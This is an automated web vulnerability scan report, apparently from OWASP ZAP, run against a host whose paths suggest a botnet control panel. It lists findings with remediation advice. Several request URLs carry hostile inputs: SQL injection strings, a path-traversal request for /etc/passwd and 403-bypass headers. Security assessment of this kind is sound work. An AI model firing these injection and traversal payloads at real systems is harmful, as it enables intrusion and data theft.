CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 603 bytes.
Request Body - size: 57 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
Instances 3
Solution
Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, use anti-CSRF packages such as the OWASP CSRFGuard.

Phase: Implementation

Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

Phase: Architecture and Design

Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

Note that this can be bypassed using XSS.

Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

Note that this can be bypassed using XSS.

Use the ESAPI Session Management control.

This control includes a component for CSRF.

Do not use the GET method for any request that triggers a state change.

Phase: Implementation

Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
Reference https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/352.html
Tags OWASP_2021_A05
WSTG-v42-SESS-05
OWASP_2017_A06
CWE Id 352
WASC Id 9
Plugin Id 20012
Medium
Application Error Disclosure
Description
This page contains an error/warning message that may disclose sensitive information like the location of the file that produced the unhandled exception. This information can be used to launch further attacks against the web application. The alert could be a false positive if the error message is found inside a documentation page.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence <b>Warning</b>: Undefined array key "id" in <b>C:\xampp\htdocs\TQUIA729JAULAMJS\tasks_page.php</b> on line <b>20</b><br />
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
Instances 10
Solution
Review the source code of this page. Implement custom error pages. Consider implementing a mechanism to provide a unique error reference/identifier to the client (browser) while logging the details on the server side and not exposing them to the user.
Reference
Tags WSTG-v42-ERRH-02
WSTG-v42-ERRH-01
OWASP_2021_A05
OWASP_2017_A06
CWE Id 200
WASC Id 13
Plugin Id 90022
Medium
Bypassing 403
Description
Bypassing 403 endpoints may be possible, the scan rule sent a payload that caused the response to be accessible (status code 200).
URL http://142.202.242.172/
Method GET
Parameter
Attack x-original-url: /TQUIA729JAULAMJS
Evidence
Request Header - size: 184 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack x-original-url: /TQUIA729JAULAMJS/Sound%20Effects
Evidence
Request Header - size: 200 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
Instances 2
Solution
Reference https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
https://www.contextis.com/en/blog/server-technologies-reverse-proxy-bypass
Tags OWASP_2021_A01
WSTG-v42-ATHN-04
OWASP_2017_A05
CWE Id
WASC Id
Plugin Id 40038
Medium
Content Security Policy (CSP) Header Not Set
Description
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.
URL http://142.202.242.172
Method GET
Parameter
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
Method GET
Parameter
Attack
Evidence
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 478 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 50
Solution
Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.
Reference https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy
https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html
https://www.w3.org/TR/CSP/
https://w3c.github.io/webappsec-csp/
https://web.dev/articles/csp
https://caniuse.com/#feat=contentsecuritypolicy
https://content-security-policy.com/
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 693
WASC Id 15
Plugin Id 10038
Medium
Directory Browsing
Description
It is possible to view a listing of the directory contents. Directory listings may reveal hidden scripts, include files, backup source files, etc., which can be accessed to reveal sensitive information.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack http://142.202.242.172/xampp/
Evidence Parent Directory
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
Instances 10
Solution
Configure the web server to disable directory browsing.
Reference https://cwe.mitre.org/data/definitions/548.html
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 548
WASC Id 16
Plugin Id 10033
Medium
HTTP Only Site
Description
The site is only served under HTTP and not HTTPS.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence
Request Header - size: 161 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 699 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence
Request Header - size: 195 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence
Request Header - size: 156 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 250 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 943 bytes.
Request Body - size: 154 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence
Request Header - size: 850 bytes.
Request Body - size: 138 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
Instances 8
Solution
Configure your web or application server to use SSL (https).
Reference https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html
https://letsencrypt.org/
Tags OWASP_2021_A05
WSTG-v42-SESS-02
OWASP_2017_A06
CWE Id 311
WASC Id 4
Plugin Id 10106
Medium
Insecure HTTP Method - TRACE
Description
The insecure HTTP method [TRACE] is enabled for this resource, and is exploitable. The TRACK and TRACE methods may be used by an attacker, to gain access to the authorisation token/session cookie of an application user, even if the session cookie is protected using the HttpOnly flag. For the attack to be successful, the application user must typically be using an older web browser, or a web browser which has a Same Origin Policy (SOP) bypass vulnerability.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence 2R0Tvyu9hL9OkaP1ANptwqTDZvLLezZcVOtHikcK
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence C1dqiAR58i46kxxkCaT8D4EW6IukmEFk3CXN6jCc
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence FRmdke6T6iK96lZpSTKVrTnEPcnHmCdLKodGEcQW
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence gb2iK69Gqat7XheJo3lrfPVkAdwqXuZH3HX0ZLf2
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence q4xRFOoFC9OldDI54eujhXZAqKYPcvmp4usnXTBh
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence R42Qj9ULBA1QxDjf0kAw4uBKBmHQJ11gipgyifkz
Request Header - size: 254 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 233 bytes.
URL http://142.202.242.172/
Method TRACE
Parameter
Attack
Evidence 2I2njUTA07fHPutp0cy5LYD7b3rLNVxkmAHFQKtj
Request Header - size: 255 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 233 bytes.
URL http://142.202.242.172/
Method TRACE
Parameter
Attack
Evidence 9les1XFsL6VR6eqgKs0dfyR16xkV0soFy3MbxWnd
Request Header - size: 217 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172/
Method TRACE
Parameter
Attack
Evidence dEyqrRMmnEa4KSXPVchQR7XLDMhPIASq0Eu4jmct
Request Header - size: 217 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172/
Method TRACE
Parameter
Attack
Evidence NnRFjbr47RVePMU3uuSflsEnSAxnwN385qzHGjn5
Request Header - size: 217 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence abViMg4o7KHJOQ36hCFXYI0BAEeib4vWcH8WVP8D
Request Header - size: 305 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 283 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence CBlynVvPXuJAfDo5mtth3ttuUr2VjgzqciilDYyE
Request Header - size: 305 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 283 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence Gu99GtFi6IzvRic8kMGz6L0U5qD1YSAU6KdFsgDE
Request Header - size: 305 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 283 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence T4zHMQvENTWubM3MvBkFsCHsPgzmriECR1zxPt82
Request Header - size: 305 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 283 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence ZmJHiCAtzQaQrejgukN1XWH2RQrucOD4QdaUC9uG
Request Header - size: 267 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 245 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
Evidence i4MbrtE1PUj0ltaHh6okLSbuUwHgSpQSwAdC1WQK
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 205 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
